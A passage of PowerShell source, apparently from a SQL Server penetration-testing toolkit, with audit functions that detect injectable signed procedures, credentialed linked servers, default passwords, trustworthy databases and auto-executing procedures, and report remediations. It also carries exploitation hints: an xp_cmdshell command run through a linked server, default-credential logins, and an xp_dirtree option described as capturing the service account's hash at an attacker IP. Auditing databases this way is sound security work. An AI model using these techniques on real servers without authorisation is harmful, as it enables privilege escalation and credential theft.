[string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login." Return } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Potential SQL Injection - Signed by Certificate Login' $Description = 'The affected procedure is using dynamic SQL and has been signed by a certificate login. As a result, it may be possible to impersonate signer if SQL injection is possible.' $Remediation = 'Consider using parameterized queries instead of concatenated strings.' $Severity = 'High' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = "No automated exploitation option has been provided, but to view the procedure code use: Get-SQLStoredProcedureSQLi -Verbose -Instance $Instance -OnlySigned" $Details = '' $Reference = 'https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # $IsVulnerable = "No" or $IsVulnerable = "Yes" # Get SP with dynamic sql and execute as owner $SQLiResults = Get-SQLStoredProcedureSQLi -Instance $Instance -Username $Username -Password $Password -Credential $Credential -OnlySig # Check for results if($SQLiResults.rows.count -ge 1){ # Confirmed vulnerable $IsVulnerable = "Yes" $IsExploitable = "Unknown" # Add information to finding for each instance of potential sqli $SQLiResults | ForEach-Object{ # Set instance values $DatabaseName = $_.DatabaseName $SchemaName = $_.SchemaName $ProcedureName = $_.ProcedureName $ObjectName = "$DatabaseName.$SchemaName.$ProcedureName" $Details = "The $ObjectName stored procedure is affected." # Add to report $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } # ------------------------------------------------------------------ # Exploit Vulnerability # ------------------------------------------------------------------ if($Exploit){ Write-Verbose "$Instance : No automatic exploitation option has been provided. Uninformed exploitation of SQLi can have a negative impact on production environments." } # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Potential SQL Injection - Signed by Certificate Login" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditPrivServerLink # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditPrivServerLink { <# .SYNOPSIS Check if any SQL Server links are configured with remote credentials. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditPrivServerLink -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : Excessive Privilege - Linked Server Description : One or more linked servers is preconfigured with alternative credentials which could allow a least privilege login to escalate their privileges on a remote server. Remediation : Configure SQL Server links to connect to remote servers using the login's current security context. Severity : Medium IsVulnerable : Yes IsExploitable : No Exploited : No ExploitCmd : Example query: SELECT * FROM OPENQUERY([Server01\SQLEXPRESS],'Select ''Server: '' + @@Servername +'' '' + ''Login: '' + SYSTEM_USER') Details : The SQL Server link Server01\SQLEXPRESS was found configured with the test login. Reference : https://msdn.microsoft.com/en-us/library/ms190479.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivServerLink -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Server Link" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Server Link." Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Excessive Privilege - Linked Server' $Description = 'One or more linked servers is preconfigured with alternative credentials which could allow a least privilege login to escalate their privileges on a remote server.' $Remediation = "Configure SQL Server links to connect to remote servers using the login's current security context." $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'There is not exploit available at this time.' if($Username) { #$ExploitCmd = "Invoke-SQLAuditPrivServerLink -Instance $Instance -Username $Username -Password $Password -Exploit" } else { #$ExploitCmd = "Invoke-SQLAuditPrivServerLink -Instance $Instance -Exploit" } $Details = '' $Reference = 'https://msdn.microsoft.com/en-us/library/ms190479.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Select links configured with static credentials $LinkedServers = Get-SQLServerLink -Verbose -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object { $_.LocalLogin -ne 'Uses Self Credentials' -and ([string]$_.RemoteLoginName).Length -ge 1} # Update vulnerable status if($LinkedServers) { $IsVulnerable = 'Yes' $LinkedServers | ForEach-Object -Process { $Details = $LinkName = $_.DatabaseLinkName $LinkUser = $_.RemoteLoginName $LinkAccess = $_.is_data_access_enabled $ExploitCmd = "Example query: SELECT * FROM OPENQUERY([$LinkName],'Select ''Server: '' + @@Servername +'' '' + ''Login: '' + SYSTEM_USER')" if($LinkUser -and $LinkAccess -eq 'True') { Write-Verbose -Message "$Instance : - The $LinkName linked server was found configured with the $LinkUser login." $Details = "The SQL Server link $LinkName was found configured with the $LinkUser login." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } } else { Write-Verbose -Message "$Instance : - No exploitable SQL Server links were found." } # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # $IsExploitable = "No" or $IsExploitable = "Yes" # Check if the link is alive and verify connection + check if sysadmin # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- # $Exploited = "No" or $Exploited = "Yes" # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') # Also, recommend link crawler module # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Server Link" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditDefaultLoginPw # --------------------------------------- # Author: Scott Sutherland # Reference: https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md Function Invoke-SQLAuditDefaultLoginPw { <# .SYNOPSIS Based on the instance name, test if SQL Server is configured with default passwords. There is also an options to check for .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditDefaultLoginPw -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : Default SQL Server Login Password Description : The target SQL Server instance is configured with a default SQL login and password. Remediation : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. Severity : High IsVulnerable : Yes IsExploitable : No Exploited : No ExploitCmd : Get-SQLQuery -Verbose -Instance SQLServer1\STANDARDDEV2014 -Q "Select @@Version" -Username test -Password test. Details : Affected credentials: test/test. Reference : https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditDefaultLoginPw -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Default SQL Server Login Password" # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Default SQL Server Login Password' $Description = 'The target SQL Server instance is configured with a default SQL login and password used by a common application.' $Remediation = 'Ensure all SQL Server logins are required to use a strong password. Consider inheriting the OS password policy.' $Severity = 'High' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = "Get-SQLQuery -Verbose -Instance $Instance -Q `"Select @@Version`" -Username test -Password test." $Details = '' $Reference = 'https://github.com/pwnwiki/pwnwiki.github.io/blob/master/tech/db/mssql.md' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # Check for default passwords $Results = Get-SQLServerLoginDefaultPw -Verbose -Instance $Instance if($Results){ $IsVulnerable = "Yes" $IsExploitable = "Yes" } # Create report records $Results | ForEach-Object { $DefaultComputer = $_.Computer $DefaultInstance = $_.Instance $DefaultUsername = $_.Username $DefaultPassword = $_.Password $DefaultIsSysadmin = $_.IsSysadmin # Check if sysadmin # Add record $Details = "Default credentials found: $DefaultUsername / $DefaultPassword (sysadmin: $DefaultIsSysadmin)." $ExploitCmd = "Get-SQLQuery -Verbose -Instance $DefaultInstance -Q `"Select @@Version`" -Username $DefaultUsername -Password $DefaultPassword" $null = $TblData.Rows.Add($DefaultComputer, $DefaultInstance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } #Status user Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Default SQL Server Login Password" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditPrivTrustworthy # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditPrivTrustworthy { <# .SYNOPSIS Check if any databases have been configured as trustworthy. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditPrivTrustworthy -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : Excessive Privilege - Trustworthy Database Description : One or more database is configured as trustworthy. The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database and the contents within it. Including potentially malicious assemblies with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious modules that are defined to execute as high privileged users. Combined with other weak configurations it can lead to user impersonation and arbitrary code exection on the server. Remediation : Configured the affected database so the 'is_trustworthy_on' flag is set to 'false'. A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used to set a database as trustworthy. A query similar to 'ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF' can be use to unset it. Severity : Low IsVulnerable : Yes IsExploitable : No Exploited : No ExploitCmd : There is not exploit available at this time. Details : The database testdb was found configured as trustworthy. Reference : https://msdn.microsoft.com/en-us/library/ms187861.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivTrustworthy -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Trusted Database" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database." Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Excessive Privilege - Trustworthy Database' $Description = 'One or more database is configured as trustworthy. The TRUSTWORTHY database property is used to indicate whether the instance of SQL Server trusts the database and the contents within it. Including potentially malicious assemblies with an EXTERNAL_ACCESS or UNSAFE permission setting. Also, potentially malicious modules that are defined to execute as high privileged users. Combined with other weak configurations it can lead to user impersonation and arbitrary code exection on the server.' $Remediation = "Configured the affected database so the 'is_trustworthy_on' flag is set to 'false'. A query similar to 'ALTER DATABASE MyAppsDb SET TRUSTWORTHY ON' is used to set a database as trustworthy. A query similar to 'ALTER DATABASE MyAppDb SET TRUSTWORTHY OFF' can be use to unset it." $Severity = 'Low' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'There is not exploit available at this time.' $Details = '' $Reference = 'https://msdn.microsoft.com/en-us/library/ms187861.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Select links configured with static credentials $TrustedDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.DatabaseName -ne 'msdb' -and $_.is_trustworthy_on -eq 'True' } # Update vulnerable status if($TrustedDatabases) { $IsVulnerable = 'Yes' $TrustedDatabases | ForEach-Object -Process { $DatabaseName = $_.DatabaseName Write-Verbose -Message "$Instance : - The database $DatabaseName was found configured as trustworthy." $Details = "The database $DatabaseName was found configured as trustworthy." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } else { Write-Verbose -Message "$Instance : - No non-default trusted databases were found." } # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # $IsExploitable = "No" or $IsExploitable = "Yes" # Check if the link is alive and verify connection + check if sysadmin # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- # $Exploited = "No" or $Exploited = "Yes" # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') # Also, recommend link crawler module # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditPrivAutoExecSp # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditPrivAutoExecSp { <# .SYNOPSIS Check if any databases have been configured as trustworthy. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditPrivAutoExecSp -Instance SQLServer1\STANDARDDEV2014 .EXAMPLE PS C:\> Invoke-SQLInstanceLocal | Invoke-SQLAuditPrivAutoExecSp -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblAutoExecPrivs = new-object System.Data.DataTable $TblAutoExecPrivs.Columns.add('ComputerName') | Out-Null $TblAutoExecPrivs.Columns.add('Instance') | Out-Null $TblAutoExecPrivs.Columns.add('DatabaseName') | Out-Null $TblAutoExecPrivs.Columns.add('SchemaName') | Out-Null $TblAutoExecPrivs.Columns.add('ProcedureName') | Out-Null $TblAutoExecPrivs.Columns.add('ProcedureType') | Out-Null $TblAutoExecPrivs.Columns.add('ProcedureDefinition') | Out-Null $TblAutoExecPrivs.Columns.add('SQL_DATA_ACCESS') | Out-Null $TblAutoExecPrivs.Columns.add('ROUTINE_BODY') | Out-Null $TblAutoExecPrivs.Columns.add('CREATED') | Out-Null $TblAutoExecPrivs.Columns.add('LAST_ALTERED') | Out-Null $TblAutoExecPrivs.Columns.add('is_ms_shipped') | Out-Null $TblAutoExecPrivs.Columns.add('is_auto_executed') | Out-Null $TblAutoExecPrivs.Columns.add('PrincipalName') | Out-Null $TblAutoExecPrivs.Columns.add('PrincipalType') | Out-Null $TblAutoExecPrivs.Columns.add('PermissionName') | Out-Null $TblAutoExecPrivs.Columns.add('PermissionType') | Out-Null $TblAutoExecPrivs.Columns.add('StateDescription') | Out-Null $TblAutoExecPrivs.Columns.add('ObjectName') | Out-Null $TblAutoExecPrivs.Columns.add('ObjectType') | Out-Null # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Auto Execute Stored Procedure" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Auto Execute Stored Procedure." Return } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Excessive Privilege - Auto Execute Stored Procedure' $Description = 'A stored procedured is configured for automatic execution and has explicit permissions assigned. This may allow non sysadmin logins to execute queries as "sa" when the SQL Server service is restarted.' $Remediation = "Ensure that non sysadmin logins do not have privileges to ALTER stored procedures configured with the is_auto_executed settting set to 1." $Severity = 'Low' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'There is not exploit available at this time.' $Details = '' $Reference = 'https://msdn.microsoft.com/en-us/library/ms187861.aspx' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- $IsVulnerable = 'Yes' # Get list of autoexec stored procedures $AutoProcs = Get-SQLStoredProcedureAutoExec -Verbose -Instance $Instance -Username $username -Password $password -Credential $credential # Get count $AutoCount = $AutoProcs | measure | select count -ExpandProperty count if($AutoCount -eq 0){ Write-Verbose "$Instance : No stored procedures were found configured to auto execute." return } # Get permissions for procs Write-Verbose "$Instance : Checking permissions..." $AutoProcs | foreach-object { # Grab autoexec proc info $ComputerName = $_.ComputerName $Instance = $_.Instance $DatabaseName = $_.DatabaseName $SchemaName = $_.SchemaName $ProcedureName = $_.ProcedureName $ProcedureType = $_.ProcedureType $ProcedureDefinition = $_.ProcedureDefinition $SQL_DATA_ACCESS = $_.SQL_DATA_ACCESS $ROUTINE_BODY = $_.ROUTINE_BODY $CREATED = $_.CREATED $LAST_ALTERED = $_.LAST_ALTERED $is_ms_shipped = $_.is_ms_shipped $is_auto_executed = $_.is_auto_executed # Get a list of explicit permissions $Results = Get-SQLDatabasePriv -Verbose -DatabaseName master -SuppressVerbose -Instance $Instance -Username $username -Password $password -Credential $credential | Where-Object {$_.objectname -like "$ProcedureName"} # Check if any permisssions exist $PermCount = $Results | measure | select count -ExpandProperty count # Add record if($PermCount -ge 1){ # Itererate through each permission $Results | ForEach-Object { # Grab permission info $PrincipalName = $_.PrincipalName $PrincipalType = $_.PrincipalType $PermissionName = $_.PermissionName $PermissionType = $_.PermissionType $StateDescription = $_.StateDescription $ObjectType = $_.ObjectType $ObjectName = $_.ObjectName $FullSpName = "$DatabaseName.$SchemaName.$ProcedureName" # Add row to results $TblAutoExecPrivs.Rows.Add( $ComputerName, $Instance, $DatabaseName, $SchemaName, $ProcedureName, $ProcedureType, $ProcedureDefinition, $SQL_DATA_ACCESS, $ROUTINE_BODY, $CREATED, $LAST_ALTERED, $is_ms_shipped, $is_auto_executed, $PrincipalName, $PrincipalType, $PermissionName, $PermissionType, $StateDescription, $ObjectName, $ObjectType ) | Out-Null Write-Verbose -Message "$Instance : - $PrincipalName has $StateDescription $PermissionName on $FullSpName." $Details = "$PrincipalName has $StateDescription $PermissionName on $FullSpName." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } } #$TblAutoExecPrivs # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # $IsExploitable = "No" or $IsExploitable = "Yes" # Check if the link is alive and verify connection + check if sysadmin $IsExploitable = "Unknown" # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- # $Exploited = "No" or $Exploited = "Yes" # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') # Also, recommend link crawler module # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Trusted Database" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditPrivXpDirtree # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditPrivXpDirtree { <# .SYNOPSIS Check if the current user has privileges to execute xp_dirtree extended stored procedure. If exploit option is used, the script will inject a UNC path to the attacker's IP and capture the SQL Server service account password hash using Inveigh. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .PARAMETER AttackerIp IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from. .PARAMETER TimeOut Number of seconds to wait for authentication from target SQL Server. .EXAMPLE PS C:\> Invoke-SQLAuditPrivXpDirtree -Verbose -Instance SQLServer1\STANDARDDEV2014 -AttackerIp ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : Excessive Privilege - Execute xp_dirtree Description : xp_dirtree is a native extended stored procedure that can be executed by members of 